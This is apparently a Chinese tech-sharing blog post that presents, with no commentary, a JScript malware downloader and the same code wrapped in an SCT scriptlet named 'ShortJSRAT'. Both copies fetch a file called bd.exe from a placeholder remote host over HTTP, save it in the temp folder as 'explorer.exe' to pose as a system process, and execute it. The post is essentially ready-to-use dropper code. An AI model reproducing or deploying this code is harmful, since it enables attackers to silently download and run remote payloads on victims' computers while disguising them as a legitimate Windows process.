JS下载者
in 技术分享 with 0 comment

JS下载者

in 技术分享 with 0 comment
var WSHShell = new ActiveXObject("WScript.Shell");
            path = WSHShell.ExpandEnvironmentStrings("%temp%");
            var filepath = path+"/explorer.exe";
            var xhr = new ActiveXObject("MSXML2.XMLHTTP");
            xhr.open("GET","http://x.x.x.x/bd.exe", false);
            xhr.send();
            if (xhr.Status == 200) {
                var fso = new ActiveXObject("Scripting.FileSystemObject");
                var stream = new ActiveXObject("ADODB.Stream");
                stream.Open();
                stream.Type = 1;
                stream.Write(xhr.ResponseBody);
                stream.Position = 0;
                if (fso.FileExists(filepath)){
                   fso.DeleteFile(filepath);
                }
                stream.SaveToFile(filepath);
                stream.Close();
                new ActiveXObject("WScript.Shell").Exec(filepath);
            }

SCT:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            var WSHShell = new ActiveXObject("WScript.Shell");
            path = WSHShell.ExpandEnvironmentStrings("%temp%");
            var filepath = path+"/explorer.exe";
            var xhr = new ActiveXObject("MSXML2.XMLHTTP");
            xhr.open("GET","http://x.x.x.x/bd.exe", false);
            xhr.send();
            if (xhr.Status == 200) {
                var fso = new ActiveXObject("Scripting.FileSystemObject");
                var stream = new ActiveXObject("ADODB.Stream");
                stream.Open();
                stream.Type = 1;
                stream.Write(xhr.ResponseBody);
                stream.Position = 0;
                if (fso.FileExists(filepath)){
                   fso.DeleteFile(filepath);
                }
                stream.SaveToFile(filepath);
                stream.Close();
                new ActiveXObject("WScript.Shell").Exec(filepath);
            }


        ]]>
</script>
</registration>
</scriptlet>
Responses